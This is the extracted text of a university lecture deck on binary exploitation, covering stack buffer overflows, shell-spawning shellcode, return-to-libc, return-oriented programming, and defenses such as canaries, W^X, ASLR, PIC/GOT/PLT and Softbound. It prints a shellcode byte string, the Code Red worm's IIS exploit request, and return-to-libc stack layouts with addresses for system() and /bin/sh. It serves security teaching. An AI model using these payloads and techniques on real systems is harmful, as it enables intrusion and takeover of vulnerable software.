1 of 106

Binary Exploitation 1�Buffer Overflows��(return-to-libc, ROP, Canaries, W^X, ASLR)

Chester Rebeiro

Indian Institute of Technology Madras

CR

2 of 106

Parts of Malware

  • Two parts

Subvert execution:

change the normal execution behavior of the program

Payload:

the code which the attacker wants to execute�

2

CR

3 of 106

Subvert Execution

  • In application software
    • SQL Injection

  • In system software
    • Buffers overflows and overreads
    • Heap: double free, use after free
    • Integer overflows
    • Format string
    • Control Flow

  • In peripherials
    • USB drives; Printers

  • In Hardware
    • Hardware Trojans

  • Covert Channels
    • Can exist in hardware or software

3

These do not really subvert execution,�but can lead to confidentiality attacks.

CR

4 of 106

Buffer Overflows in the Stack

  • We need to first know how a stack is managed

4

http://insecure.org/stf/smashstack.html

CR

5 of 106

Stack in a Program�(when function is executing)

5

EBP

Parameters

for function

return Address

Locals of function

prev frame pointer

push $3

push $2

push $1

Stack

call function

push %ebp

movl %esp, %ebp

sub $20, %esp

%ebp: Frame Pointer

In main

In function

ESP

ESP

ESP

ESP

ESP

ESP

%esp : Stack Pointer

CR

6 of 106

Stack Usage (example)

6

Stack (top to bottom):

address

stored data

1000 to 997

3

996 to 993

2

992 to 989

1

988 to 985

return address

984 to 981

%ebp (stored frame pointer)

(%ebp)980 to 976

buffer1

975 to 966

buffer2

(%sp) 964

stack pointer

Parameters

for function

Return Address

Locals of function

prev frame pointer

frame pointer

CR

7 of 106

Stack Usage Contd.

7

Stack (top to bottom):

address

stored data

1000 to 997

3

996 to 993

2

992 to 989

1

988 to 985

return address

984 to 981

%ebp (stored frame pointer)

(%ebp)980 to 976

buffer1

975 to 966

buffer2

(%sp) 964

What is the output of the following?

  • printf(“%x”, buffer2) : 966
  • printf(“%x”, &buffer2[10])

976 🡪 buffer1

Therefore buffer2[10] = buffer1[0]

A BUFFER OVERFLOW

CR

8 of 106

Modifying the Return Address

buffer2[19] =

&arbitrary memory location

This causes execution of an arbitrary memory location instead of the standard return

8

Stack (top to bottom):

address

stored data

1000 to 997

3

996 to 993

2

992 to 989

1

988 to 985

984 to 981

%ebp (stored frame pointer)

(%ebp)980 to 976

buffer1

976 to 966

buffer2

(%sp) 964

Return Address

19

Arbitrary Location

CR

9 of 106

Now that we seen how buffer overflows can skip an instruction,

We will see how an attacker can use it to execute his own code (exploit code)

9

Stack (top to bottom):

address

stored data

1000 to 997

3

996 to 993

2

992 to 989

1

988 to 985

ATTACKER’S code pointer

984 to 981

%ebp (stored frame pointer)

(%ebp)980 to 976

buffer1

976 to 966

buffer2

(%sp) 964

CR

10 of 106

Big Picture of the exploit

Fill the stack as follows

(where BA is buffer address)

10

stack pointer

Parameters

for function

Return Address

buffer

prev frame pointer

frame pointer

Exploit code

BA

BA

buffer Address

BA

BA

BA

BA

BA

BA

BA

CR

11 of 106

Payload

  • Lets say the attacker wants to spawn a shell
  • ie. do as follows:

  • How does he put this code onto the stack?

11

CR

12 of 106

Step 1 : Get machine codes

12

  • objdump –disassemble-all shellcode.o
  • Get machine code : “eb 1e 5e 89 76 08 c6 46 07 00 c7 46 0c 00 00 00 00 b8 0b 00 00 00 89 f3 8d 4e 08 8d 56 0c cd 80 cd 80”
  • If there are 00s replace it with other instructions

CR

13 of 106

Step 2: Find Buffer overflow in an application

13

O

O

O

O

o

Defined on stack

CR

14 of 106

Step 3 :�Put Machine Code in Large String

14

shellcode

large_string

CR

15 of 106

Step 3 (contd) : �Fill up Large String with BA

15

shellcode

BA

BA

BA

BA

BA

BA

BA

BA

large_string

Address of buffer is BA

CR

16 of 106

Final state of Stack

  • Copy large string into buffer

  • When strcpy returns the

exploit code would be executed

16

shellcode

BA

BA

BA

BA

BA

BA

BA

BA

large_string

shellcode

BA

BA

buffer Address

BA

BA

BA

BA

BA

BA

BA

buffer

BA

CR

17 of 106

Putting it all together

17

bash$ gcc overflow1.c

bash$ ./a.out

$sh

CR

18 of 106

Buffer overflow in the Wild

  • Worm CODERED … released on 13th July 2001
  • Infected 3,59,000 computers by 19th July.

18

CR

19 of 106

CODERED Worm

  • Targeted a bug in Microsoft’s IIS web server
  • CODERED’s string

19

GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0

CR

20 of 106

Defenses

20

  • Eliminate program flaws that could lead to subverting of execution

Safer programming languages; Safer libraries; hardware enhancements; � static analysis

  • If can’t eliminate, make it more difficult for malware to subvert execution

W^X , ASLR, canaries

  • If malware still manages to execute, try to detect its execution at runtime

malware run-time detection techniques using learning techniques, ANN and malware signatures

  • If can’t detect at runtime, try to restrict what the malware can do..
    • Sandbox system�so that malware affects only part of the system; access control; virtualization; trustzone; SGX
    • Track information flow

DIFT; ensure malware does not steal sensitive information

CR

21 of 106

Preventing Buffer Overflows�with Canaries and W^X

21

CR

22 of 106

Canaries

22

Stack (top to bottom):

stored data

3

2

1

ret addr

sfp (%ebp)

Insert canary here

buffer1

buffer2

Insert a canary here

check if the canary value

has got modified

  • Known (pseudo random) values placed on stack to monitor buffer overflows.
  • A change in the value of the canary indicates a buffer overflow.
  • Will cause a ‘stack smashing’ to be detected

CR

23 of 106

Canaries and gcc

23

  • As on gcc 4.4.5, canaries are not added to functions by default
    • Could cause overheads as they are executed for every function that gets executed
  • Canaries can be added into the code by –fstack-protector option
    • If -fstack-protector is specified, canaries will get added based on a gcc heuristic
      • For example, buffer of size at-least 8 bytes is allocated
      • Use of string operations such as strcpy, scanf, etc.

  • Canaries can be evaded quite easily by not altering the contents of the canary

CR

24 of 106

Canaries Example

24

Without canaries, the return address on stack gets overwritten resulting in a segmentation fault. With canaries, the program gets aborted due to stack smashing.

CR

25 of 106

Canaries Example

25

Without canaries, the return address on stack gets overwritten resulting in a segmentation fault. With canaries, the program gets aborted due to stack smashing.

CR

26 of 106

Canary Internals

26

Store canary onto stack

Verify if the canary has changed

Without canaries

With canaries

gs is a segment that shows thread local data; in this case it is used for picking out canaries

CR

27 of 106

Non Executable Stacks (W^X)

  • In Intel/AMD processors, ND/NX bit present to mark non code regions as non-executable.
    • Exception raised when code in a page marked W^X executes
  • Works for most programs
    • Supported by Linux kernel from 2004
    • Supported by Windows XP service pack 1 and Windows Server 2003
      • Called DEP – Data Execution Prevention
  • Does not work for some programs that NEED to execute from the stack.
    • Eg. JIT Compiler, constructs assembly code from external data and then executes it.�(Need to disable the W^X bit, to get this to work)

27

27

CR

28 of 106

Will non executable stack prevent buffer overflow attacks ?

Return – to – LibC Attacks

(Bypassing non-executable stack during exploitation using return-to-libc attacks)

28

28

https://css.csail.mit.edu/6.858/2010/readings/return-to-libc.pdf

CR

29 of 106

Return to Libc�(big picture)

29

29

Exploit code

BA

BA

BA

BA

BA

BA

BA

BA

buffer

This will not work if ND bit is set

Return Address

CR

30 of 106

Return to Libc�(replace return address to point to a function within libc)

30

30

F1 Addr

F1 Addr

F1 Addr

F1 Addr

F1 Addr

F1 Addr

F1 Addr

F1 Addr

buffer

Return Address

F1 Addr

Stack

Heap

Data

Text

Bypasses W^X since F1 is in the code segment,

And can be legally executed.

CR

31 of 106

F1 = system()

  • One option is function system present in libc

system(“/bin/bash”);

would create a bash shell

(there could be other options as well)

So we need to

  1. Find the address of system in the program�(does not have to be a user specified function, could be a function present in one of the linked libraries)
  2. Supply an address that points to the string

/bin/sh

31

31

CR

32 of 106

The return-to-libc attack

32

32

F1ptr

F1ptr

F1ptr

F1ptr

F1ptr

Shell ptr

F1 ptr

F1ptr

buffer

F1ptr

Return Address

system()

In libc

/bin/bash

CR

33 of 106

Find address of system in the executable

33

33

CR

34 of 106

Find address of /bin/sh

  • Every process stores the enviroment variables at the bottom of the stack
  • We need to find this and extract the string /bin/sh from it

34

34

CR

35 of 106

Finding the address of the string �/bin/sh

35

CR

36 of 106

The final Exploit Stack

36

xxx

xxx

xxx

0x28085260

dead

0xbfbffe25

xxx

xxx

buffer

xxx

Return Address

system()

In libc

/bin/sh

CR

37 of 106

A clean exit

37

xxx

xxx

xxx

0x28085260

0x281130d0

0xbfbffe25

xxx

xxx

buffer

xxx

Return Address

system()

In libc

/bin/bash

exit()

In libc

CR

38 of 106

Limitation of ret2libc

38

38

Limitation on what the attacker can do

(only restricted to certain functions in the library)

These functions could be removed from the library

CR

39 of 106

Return Oriented Programming�(ROP)

39

CR

40 of 106

Push and ESP

40

Stack Segment (top)

ESP

SS

push %EDX

  1. Decrement ESP by 4 bytes
  2. Copy EDX onto the stack

CR

41 of 106

Call and ESP

41

Stack Segment (top)

ESP

SS

call Address

Instr. After call

  1. Change EIP to the next instruction
  2. Decrement ESP by 4 bytes
  3. Copy EIP onto the stack

EIP

CR

42 of 106

Pop and ESP

42

Stack Segment (top)

ESP

SS

pop %EDX

  1. Increment ESP by 4 bytes
  2. Copy contents of stack to EDX register

CR

43 of 106

Ret and ESP

43

Stack Segment (top)

ESP

SS

ret

Return address

  1. Increment ESP by 4 bytes
  2. Copy contents of stack to EIP register

CR

44 of 106

Return Oriented Programming Attacks

  • Discovered by Hovav Shacham of Stanford University
  • Subverts execution to libc
    • As with the regular ret-2-libc, can be used with non executable stacks since the instructions can be legally execute
    • Unlike ret-2-libc does not require to execute functions in libc (can execute any arbitrary code)

44

The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86

CR

45 of 106

Target Payload

Lets say this is the payload needed to be executed by an attacker.

Suppose there is a function in libc, which has exactly this sequence of instructions … then we are done.. we just need to subvert execution to the function

What if such a function does not exist?�If you can’t find it then build it

45

CR

46 of 106

Step 1: Find Gadgets

  • Find gadgets
  • A gadget is a short sequence of instructions followed by a return

  • Useful instructions : should not transfer control outside the gadget

  • This is a pre-processing step by statically analyzing the libc library

46

useful instruction(s)

ret

CR

47 of 106

Step 2: Stitching

  • Stitch gadgets so that the payload is built

47

Program Binary

movl %esi, 0x8(%esi)

ret

G1

movb $0x0, 0x7(%esi)

ret

G2

movb $0x0, 0xc(%esi)

ret

G3

movl $0xb, %eax

ret

G4

Ret instruction has 2 steps:

  • Pops the contents pointed to by ESP into EIP
  • Increment ESP by 4 (32bit machine)

CR

48 of 106

Step 3: Construct the Stack

48

xxx

xxx

xxx

AG1

AG2

AG3

AG4

xxx

buffer

xxx

Return Address

Program Binary

movl %esi, 0x8(%esi)

ret

G1

movb $0x0, 0x7(%esi)

ret

G2

movb $0x0, 0xc(%esi)

ret

G3

movl $0xb, %eax

ret

G4

Program Stack

AGi: Address of Gadget i

CR

49 of 106

Finding Gadgets

  • Static analysis of libc
  • To find
    1. A set of instructions that end in a ret (0xc3)

The instructions can be intended (put in by the compiler) or unintended

    • Besides ret, none of the instructions transfer control out of the gadget

49

CR

50 of 106

Intended vs Unintended Instructions

  • Intended : machine code intentionally put in by the compiler
  • Unintended : interpret machine code differently in order to build new instructions

50

F7 C7 07 00 00 00 0F 95 45 C3

Machine Code :

What the compiler intended..

What was not ntended

Highly likely to find many diverse instructions of this form in x86; not so likely to�have such diverse instructions in RISC processors

CR

51 of 106

Geometry

  • Given an arbitrary string of machine code, what is the probability that the code can be interpreted as useful instructions.
    • x86 code is highly dense
    • RISC processors like (SPARC, ARM, etc.) have low geometry
  • Thus finding gadgets in x86 code is considerably more easier than that of ARM or SPARC
  • Fixed length instruction set reduces geometry

51

CR

52 of 106

Finding Gadgets

  • Static analysis of libc
  • Find any memory location with 0xc3 (RETurn instruction)
  • Build a trie data structure with 0xc3 as a root
  • Every path (starting from any node, not just the leaf) to the root is a possible gadget

52

C3

00

24

37

24

46

43

16

89

94

child of

CR

53 of 106

Finding Gadgets

  • Scan libc from the beginning toward the end
  • If 0xc3 is found
    • Start scanning backward
    • With each byte, ask the question if the subsequence forms a valid instruction
    • If yes, add as child
    • If no, go backwards until we reach the maximum instruction length (20 bytes)
    • Repeat this till (a predefined) length W, which is the max instructions in the gadget

53

33

b2

23

12

a0

31

a5

67

22

ab

ba

4a

3c

c3

ff

ee

ab

31

11

09

CR

54 of 106

Finding Gadgets Algorithm

54

CR

55 of 106

Finding Gadgets Algorithm

55

is this sequence of instructions valid x86 instruction?

Boring: not interesting to look further;

Eg. pop %ebp; ret;;;; leave; ret (these are boring if we want to ignore intended instructions)

Jump out of the gadget instructions

Found 15,121 nodes in�~1MB of libc binary

CR

56 of 106

More about Gadgets

  • Example Gadgets
    • Loading a constant into a register (edx 🡨 deadbeef)

56

deadbeef

GadgetAdd

stack

pop %edx

ret

esp

  • A previous return will pop the gadget address int %eip
  • %esp will also be incremented to point to deadbeef� (4 bytes on 32 bit platform)
  • The pop %edx will pop deadbeef onto the stack and increment %esp to point to the next 4 bytes on the stack

CR

57 of 106

Stitch

57

pop %edx

ret

G1

mov 64(%edx), %eax

ret

G2

G2

addr

G1

stack

esp

deadbeef

addr+64

Load arbitrary data into eax register using

Gadgets G1 and G2

CR

58 of 106

Store Gadget

  • Store the contents of a register to a memory location in the stack

58

GadgetAddr 2

0

GadgetAddr 1

stack

pop %edx

ret

esp

mov %eax, 24(%edx)

ret

24

CR

59 of 106

Gadget for addition

59

addl (%edx), %eax

inc %esp

mov %edi, (%esp)

ret

Add the memory pointed�to by %edx to %eax.

The result is stored in %eax

why is this present?�…. This is unnecessary, but�this is best gadget that we can�find for addition

But can create problems!!

We need work arounds!

GadgetAddr2

GadgetAddr

stack

esp

Modified

CR

60 of 106

Gadget for addition�(put 0xc3 into %edi)

60

addl (%edx), %eax

inc %esp

mov %edi, (%esp)

ret

  1. First put gadget ptr for 0xC3 into �%edi
  2. 0xC3 corresponds to NOP in�ROP
  3. Push %edi in gadget 2 just pushes�0xc3 back into the stack�Therefore not disturbing the stack�contents
  4. Gadget 3 executes as planned

GadgetAddr3

Gadget_RET

GadgetAddr2

Gadget_RET

GadgetAddr1

stack

esp

0xc3

0xc3 is ret ; in ROP ret is equivalent to NOP v

pop %edi

ret

CR

61 of 106

Unconditional Branch�in ROP

  • Changing the %esp causes unconditional jumps

61

GA

stack

esp

pop %esp

ret

CR

62 of 106

Conditional Branches

62

In x86 instructions conditional branches have 2 parts

  1. An instruction which modifies a condition flag (eg CF, OF, ZF)

eg. CMP %eax, %ebx (will set ZF if %eax = %ebx)

2. A branch instruction (eg. JZ, JCC, JNZ, etc)� which internally checks the conditional flag and� changes the EIP accordingly

In ROP conditional branches have 3 parts

  1. An ROP which modifies a condition flag (eg CF, OF, ZF)

eg. CMP %eax, %ebx (will set ZF if %eax = %ebx)

2. Transfer flags to a register or memory

3. Perturb %esp based on flags stored in memory

In ROP, we need flags to modify %esp register instead of EIP

Needs to be explicitly handled

CR

63 of 106

Step 1 : Set the flags

Find suitable ROPs that set appropriate flags

63

CMP %eax, %ebx

RET

subtraction

Affects flags CF, OF, SF, ZF, AF, PF

NEG %eax

RET

2s complement negation

Affects flags CF

CR

64 of 106

Step 2: Transfer flags to �memory or register

  • Using lahf instruction� stores 5 flags (ZF, SF, AF, PF, CF) in the %ah register�
  • Using pushf instruction� pushes the eflags into the stack�

ROPs for these two not easily found.

A third way – perform an operation whose result depends on the flag contents.

64

where would one use this instruction?

CR

65 of 106

Step 2: Indirect way to transfer flags to memory

Several instructions operate using the contents of the flags�

65

ADC %eax, %ebx : add with carry; performs eax <- eax + ebx + CF

(if eax and ebx are 0 initially, then the result will be either 1 or 0 depending on the CF)

RCL : rotate left with carry;

RCL %eax, 1

(if eax = 0. then the result is either 0 or 1 depending on CF)

CR

66 of 106

Gadget to transfer flags to memory

66

%edx will have value A

%ecx will contain 0x0

A

CR

67 of 106

Step 3: Perturb %esp depending �on flag

67

If (CF is set){

perturb %esp

}else{

leave %esp as it is

}

What we hope to achieve

CF stored in a memory location (say X)

Current %esp

delta, how much to perturb %esp

What we have

negate X

offset = delta & X

%esp = %esp + offset

One way of achieving …

  1. Negate X (eg. Using instruction negl)� finds the 2’s complement of X� if (X = 1) 2’s complement is 111111111…

if (X = 0) 2’s complement is 000000000...

2. offset = delta if X = 1� offset = 0 if X = 0

3. %esp = %esp + offset if X = 1� %esp = %esp if X = 0

CR

68 of 106

Turing Complete

  • Gadgets can do much more…� invoke libc functions, � invoke system calls, ...
  • For x86, gadgets are said to be turning complete
    • Can program just about anything with gadgets
  • For RISC processors, more difficult to find gadgets
    • Instructions are fixed width
    • Therefore can’t find unintentional instructions
  • Tools available to find gadgets automatically

Eg. ROPGadget (https://github.com/JonathanSalwan/ROPgadget)

Ropper (https://github.com/sashs/Ropper)

68

CR

69 of 106

Address Space Layout Randomization�(ASLR)

69

CR

70 of 106

The Attacker’s Plan

  • Find the bug in the source code (for eg. Kernel) that can be exploited
    • Eyeballing
    • Noticing something in the patches
    • Following CVE
  • Use that bug to insert malicious code to perform something nefarious
    • Such as getting root privileges in the kernel

Attacker depends upon knowning where these functions reside in memory. Assumes that many systems use the same address mapping. Therefore one exploit may spread easily

70

CR

71 of 106

Address Space Randomization

  • Address space layout randomization (ASLR) randomizes the address space layout of the process
  • Each execution would have a different memory map, thus making it difficult for the attacker to run exploits
  • Initiated by Linux PaX project in 2001
  • Now a default in many operating systems

71

Memory layout across boots for a Windows box

CR

72 of 106

ASLR in the Linux Kernel

  • Locations of the base, libraries, heap, and stack can be randomized in a process’ address space

  • Built into the Linux kernel and controlled by�/proc/sys/kernel/randomize_va_space

  • randomize_va_space can take 3 values�0 : disable ASLR�1 : positions of stack, VDSO, shared memory regions are randomized� the data segment is immediately after the executable code

2 : (default setting) setting 1 as well as the data segment location is

randomized

72

CR

73 of 106

ASLR in Action

73

First Run

Another Run

CR

74 of 106

ASLR in the Linux Kernel

  • Permanent changes can be made by editing the /etc/sysctl.conf file

74

/etc/sysctl.conf, for example:

kernel.randomize_va_space = value

sysctl -p

CR

75 of 106

Internals : Making code relocatable

  • Load time relocatable
    • where the loader modifies a program executable so that all addresses are adjusted properly
    • Relocatable code
      • Slow load time since executable code needs to be modified.
      • Requires a writeable code segment, which could pose problems
  • PIE : position independent executable
    • a.k.a PIC (position independent code)
    • code that executes properly irrespective of its absolute address
    • Used extensively in shared libraries
      • Easy to find a location where to load them without overlapping with other modules

75

CR

76 of 106

Load Time Relocatable

76

1

CR

77 of 106

Load Time Relocatable

77

note the 0x0 here… �the actual address of mylib_int is not filled in

2

CR

78 of 106

Load Time Relocatable

78

Relocatable table present in the executable�that contains all references of mylib_int

3

CR

79 of 106

Load Time Relocatable

79

The loader fills in the actual address of mylib_int�at run time.

4

CR

80 of 106

Load Time Relocatable

80

Limitations

  • Slow load time since executable code needs to be modified

      • Requires a writeable code segment, which could pose problems.�
      • Since executable code of each program needs to be customized, it would prevent sharing of code sections

CR

81 of 106

PIC Internals

  • An additional level of indirection for all global data and function references
  • Uses a lot of relative addressing schemes and a global offset table (GOT)
  • For relative addressing,
    • data loads and stores should not be at absolute addresses but must be relative

81

Details about PIC and GOT taken from …

http://eli.thegreenplace.net/2011/11/03/position-independent-code-pic-in-shared-libraries/

CR

82 of 106

Global Offset Table (GOT)

  • Table at a fixed (known) location in memory space and known to the linker
  • Has the location of the absolute address of variables and functions

82

Without GOT

With GOT

CR

83 of 106

Enforcing Relative Addressing�(example)

83

With load time relocatable

With PIC

CR

84 of 106

Enforcing Relative Addressing�(example)

84

With load time relocatable

With PIC

Get address of next instruction�to achieve relativeness

Index into GOT and get the �actual address of mylib_int into�eax

Now work with the actual �address.

CR

85 of 106

Advantage of the GOT

  • With load time relocatable code, every variable reference would need to be changed
    • Requires writeable code segments
    • Huge overheads during load time
    • Code pages cannot be shared
  • With GOT, the GOT table needs to be constructed just once during the execution
    • GOT is in the data segment, which is writeable
    • Data pages are not shared anyway
    • Drawback : runtime overheads due to multiple loads

85

CR

86 of 106

An Example of working with GOT

86

$gcc –m32 –shared –fpic –S got.c

Besides a.out, this compilation also generates got.s

The assembly code for the program

CR

87 of 106

87

Data section

Text section

Fills %ecx with the eip of the next�instruction. �Why do we need this indirect way of doing this?

In this case what will %ecx contain?

The macro for the GOT is known by the linker.

%ecx will now contain the offset to GOT

Load the absolute address of myglob from the�GOT into %eax

CR

88 of 106

More

88

offset of myglob�in GOT

GOT it!

CR

89 of 106

Deep Within the Kernel �(randomizing the data section)

89

loading the executable

Check if randomize_va_space�is > 1 (it can be 1 or 2)

Compute the end of the data segment (m->brk + 0x20)

Finally Randomize

CR

90 of 106

Function Calls in PIC

  • Theoretically could be done similar with the data…
    • call instruction gets location from GOT entry that is filled in during load time (this process is called binding)
    • In practice, this is time consuming. Much more functions than global variables. Most functions in libraries are unused
  • Lazy binding scheme
    • Delay binding till invocation of the function
    • Uses a double indirection – PLT – procedure linkage table in addition to GOT

90

CR

91 of 106

The PLT

91

1

  • Instead of directly calling func, invoke an offset in the PLT instead.
  • PLT is part of the executable text section, and consists of one entry for each external function the shared library calls.
  • Each PLT entry has � a jump location to a specific GOT entry

Preparation of arguments for a ‘resolver’

Call to resolver function

CR

92 of 106

First Invocation of Func

First Invocation of fun

92

1

2

(steps 2 and 3)

On first invocation of func, PLT[n]�jumps to GOT[n], which simply jumps

back to PLT[n]

3

CR

93 of 106

First Invocation of Func

93

1

2

(step 4). Invoke resolver, which resolves the actual of func, �places this actual address into GOT

and then invokes func

The arguments passed to resolver, that helps to do symbol resolution

Note that the contents of GOT is now�changed to point to the actual address�of func

3

4

CR

94 of 106

Example of PLT

94

Compiler converts the call to set_mylib_int�into set_mylib_int@plt

CR

95 of 106

Example of PLT

95

ebx points to the GOT table�ebx + 0x10 is the offset corresponding�to set_mylib_int

Offset of set_mylib_int in the GOT (+0x10).

It contains the address of the next instruction (ie. 0x3c2)

CR

96 of 106

Example of PLT

96

Push arguments for the resolver.

Jump to the first entry of the PLT

Ie. PLT[0]

Jump to the resolver, which resolves the actual address of set_mylib_int and fills it into the GOT

CR

97 of 106

Subsequent invocations of Func

97

1

2

3

CR

98 of 106

Advantages

  • Functions are relocatable, therefore good for ASLR
  • Functions resolved only on need, therefore saves time during the load phase

98

CR

99 of 106

Bypassing ASLR

  • Brute force
  • Return-to-PLT
  • Overwriting the GOT
  • Timing Attacks

99

CR

100 of 106

Safer Programming Languages,�and Compiler Techniques

100

CR

101 of 106

Other Precautions for buffer overflows

  • Enforce memory safety in programming language
    • Example java, C# (slow and not feasible for system programming)
      • Cannot replace C and C++. �(Too much software already developed in C / C++)

    • Newer languages like Rust seem promising

  • Use securer libraries. For example C11 annex K, gets_s, strcpy_s, strncpy_s, etc.

(_s is for secure)

101

CR

102 of 106

Compile Bounds Checking

  • Check accesses to each buffer so that it cannot be beyond the bounds
  • In C and C++, bound checking performed at pointer calculation time or dereference time.
  • Requires run-time bound information for each allocated block.
  • Two methodologies
    • Object based techniques
    • Pointer based techniques

102

Softbound : Highly Compatible and Complete Spatial Memory Safety for C

Santosh Nagarakatte, Jianzhou Zhao, Milo M. K. Martin, and Steve Zdancewic

CR

103 of 106

Softbound

  • Every pointer in the program is associated with a base and bound
  • Before every pointer dereference to verify to verify if the dereference is legally permitted

These checks are automatically inserted at compile time for all pointer variables. For non-pointers, this check is not required.

103

CR

104 of 106

Softbound – more details

  • pointer arithmetic and assignment�The new pointer inherits the base and bound of the original pointer

No specific checks are required, until dereferencing is done

104

CR

105 of 106

Storing Metadata

  • Table maintained for metadata

105

CR

106 of 106

Softbound – more details

  • Pointers passed to functions
    • If pointers are passed by the stack�no issues. The compiler can put information related to metadata onto the stack
    • If pointers passed by registers.

Compiler modifies every function declaration to

add more arguments related to metadata

For each function parameter that is a pointer, the corresponding base

and bound values are also sent to the function

106

CR